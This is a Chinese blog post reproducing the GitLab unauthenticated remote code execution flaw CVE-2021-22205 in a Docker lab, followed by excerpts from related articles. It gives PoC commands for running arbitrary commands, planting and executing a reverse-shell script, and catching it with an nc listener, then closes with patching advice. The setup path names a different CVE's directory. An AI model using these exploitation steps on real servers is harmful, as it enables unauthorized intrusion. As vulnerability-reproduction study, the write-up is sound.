代码编织梦想

最近在准备ctf比赛,抽出时间复现了该漏洞,希望各位大佬多多指导。顺便求一位会ctfweb方面的大佬指点一下,不用多厉害,我ctfweb方面就是小白。。。。

文章目录

  • 漏洞信息
  • 影响版本
  • gitlab漏洞环境
  • shell反弹
  • 修改方案


漏洞信息

GitLab是一款Ruby开发的Git项目管理平台。如11.9以后的GitLab中,因为使用了图片处理工具ExifTool而受到漏洞CVE-2021-22204ExifTool CVE-2021-22204 - Arbitrary Code Execution | devcraft.ioBackgroundhttps://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html)的影响,攻击者可以通过一个未授权的接口上传一张恶意构造的图片,进而在GitLab服务器上执行命令。


影响版本
11.9 <= Gitlab CE/EE < 13.8.8
13.9 <= Gitlab CE/EE < 13.9.6
13.10 <= Gitlab CE/EE < 13.10.3

gitlab漏洞环境
使用vulhub的docker环境

vulhub地址:Vulhub - Docker-Compose file for vulnerability environment

搭建过程

  1. 进入目标目录:cd /root/桌面/vulhub-master/metabase/CVE-2021-41277/
  2. 打开dockers容器:docker-compose up -d
  3. 查看主机IP地址:ifconfig
  4. 查看容器开启的端口:docker ps
  5. 地址加端口查看服务:http://192.168.162.129:8080

使用自带poc创建文件:

python poc.py http://192.168.162.129:8080 "touch /tmp/hello"

示例:

 查看文件是否创建成功:

docker ps
docker exe -it ID(该id为docker ps查看到的第一个) /bin/bash
cd /tmp
ls

示例:

 发现hello文件,文件上传成功。

shell反弹

下载POC:

poc下载地址

将poc下载后拉入kali虚拟机内,在poc位置打开终端,检测漏洞是否存在。

python CVE-2021-2205.py -v true your-ip:8080

示例:

 

 创建.sh文件:

反弹shell一键写成

python CVE-2021-2205.py -a true -t your-ip:8080/ "echo'反弹shell命令' >/shell.sh"

 

 返回刚刚查看文件是否上传成功的终端再次查看文件是否上传成功:

直接ls命令查看:

示例:

 对刚刚上传的shell.sh文件进行提权:

python CVE-2021-2205.py -a true -t your-ip:8080/ -c "chmod +x /tmp/shell.sh"

 示例:(shell文件变成绿色,证明提权成功)

 到nc所在虚拟机打开nc监听(我这里是又启用了一台win7虚拟机进行nc监听)

nc -lvnp 22314

 进行shell反弹:

python CVE-2021-2205.py -a true -t your-ip:8080/ -c "/bin/bash /tmp/shell.sh"

示例:

反弹shell成功

示例: 

 至此,漏洞复现结束。


 修改方案

1、及时升级GitLab至最新安全版本

2、配置访问控制策略,避免受影响的GitLab暴露在公网

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Wiofgb/article/details/127123332

(CVE-2021-22214)Gitlab SSRF漏洞 漏洞复现-爱代码爱编程

简介 GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务。 漏洞描述 GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。Gitlab的CI lint API用于验证

详细分析GitLab CE 已遭在野利用漏洞 (CVE-2021-22205)-爱代码爱编程

 聚焦源代码安全,网罗国内外最新资讯! 作者:Piergiovanni Cipolloni 编译:代码卫士 HN Security 团队指出,几个月前,客户在自己的 GitLab CE 服务器上发现了两个可疑的具有管理员权限的用户账户,并邀请研究人员进行调查。如下是调查结果。 (1)   在2021年6月至7月间,两名用户注册了看似随

CVE-2021-22205:Gitlab RCE-爱代码爱编程

影响范围 Gitlab CE/EE < 13.10.3Gitlab CE/EE < 13.9.6Gitlab CE/EE < 13.8.8漏洞类型 远程命令执行 利用条件 影响范围应用 漏洞成因 在上传图片文件时,Gitlab Workhorse将扩展名为jpg|jpeg|tiff的文件通过ExifTool删除任何非白名单标记

Gitlab 远程命令执行RCE漏洞CVE-2021-22205附exp-爱代码爱编程

0x01 漏洞介绍&原理 GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,是一款Ruby开发的Git项目管理平台。由于在11.9以后的GitLab中,使用了图片处理工具ExifTool,而此图片处理工具又受到了漏洞CVE-2021-22204的影响: 漏洞触发ExifTool功能处,ExifTool是用于从图像中移

【漏洞复现】CVE-2021-22205 GitLab 未授权RCE-爱代码爱编程

0x00 漏洞简介: 漏洞出来第一时间,听漏洞浍测的朋友传来的情报,就及时给了POC,但一直没复现,只是简单看了文章,提到需要可以注册用户才能进行攻击,然后就感觉挺鸡肋,没有再继续看。 恰巧好基友涛子给我发来他复现的文章,看了看exp,感觉并没那么鸡肋,相反可以通过未授权进行权限的获取,正好自己也复现了一手,同时借用涛子的文章给大家展现了出来。

GitLab执行漏洞(CVE-2021-22205)修复记录-爱代码爱编程

腾讯云木马文件通知 10月29日,腾讯云就发送邮件警报【木马文件通知】,如下:检测到存在未处理的木马文件:/tmp/woritf,您的服务器疑似被黑客入侵,可能造成严重损失 当时只是简单处理了下,将/tmp/woritf文件删除,之后就没有再管了。 10月31日,又有邮件报警【木马文件通知】,竟然又校测到木马文件,如下:检测到存在未处理的木马文件:

gitlab 未授权rce (CVE-2021-22205)-爱代码爱编程

gitlab 未授权rce (CVE-2021-22205) gitlab 未授权rce (CVE-2021-22205)0x01 漏洞描述0x02 影响范围0x03 漏洞复现查看帮助先用验证模式执行命令反弹shell0x04 漏洞修复 所有文章,仅供安全研究与学习之用,后果自负! gitlab 未授权rce (CVE-2021-22205)

GitLab 远程命令执行漏洞复现CVE-2021-22205-爱代码爱编程

雨笋教育小编今天分享我们工程师发布的关于GitLab 远程命令执行漏洞复现的一篇技术干货,分享给你们一起学习。 GitLab 官方发布安全补丁更新修复了GitLab命令执行漏洞(CVE-2021- 22205)。由于GitLab中的ExifTool没有对传⼊的图像文件的扩展名进行正确处理,攻击者通过 上传特制的恶意图片,可以在目标服务器上执行任意命令,且

CVE-2021-22205 GitLab 未授权RCE 复现-爱代码爱编程

本文主要复现2021年初出现的gitlab RCE漏洞 1.漏洞影响范围 11.9 <= Gitlab CE/EE < 13.8.8 13.9 <= Gitlab CE/EE < 13.9.6 13.10 <= Gitlab CE/EE < 13.10.3 1.2 版本检测 cat /opt/gitlab/e

gitlab 远程命令执行漏洞(cve-2021-22205)_weixin_42299610的博客-爱代码爱编程

概述 风险等级:高 缺陷描述: 由于GitLab中的ExifTool没有对传入的图像文件的扩展名进行正确处理,攻击者通过上传特制的恶意图片,可以在目标服务器上执行任意命令。此次受影响版本为11.9 <= Gitlab CE/EE < 13.8.8;13.9 <= Gitlab CE/EE < 13.9.6;13.10 <= G

cve-2021-22205 gitlab exiftool远程命令执行 复现_俺不想学习的博客-爱代码爱编程

1 漏洞信息 漏洞名称Gitlab exiftool远程命令执行漏洞漏洞编号CVE-2021-22205危害等级高危CVSS评分7.5漏洞类型中间件漏洞漏洞厂商GitLab漏洞组件Gitlab exiftool受影响版本11.9 <= GitLab(CE/EE)< 13.8.813.9 <= GitLab(CE/EE)< 13.9

cve-2021-22205 gitlab 远程命令执行漏洞复现_luochen678的博客-爱代码爱编程

目录 一、漏洞信息 二、环境搭建 三、复现过程 1.测试漏洞 2.漏洞利用,反弹shell 四、修复建议 一、漏洞信息 漏洞名称GITLAB 远程命令执行漏洞漏洞编号CVE-2021-22205危害等级高危CVSS评分6.5漏洞厂商Ruby受影响版本11.9 <= Gitlab CE/EE < 13.8.8;13.9 <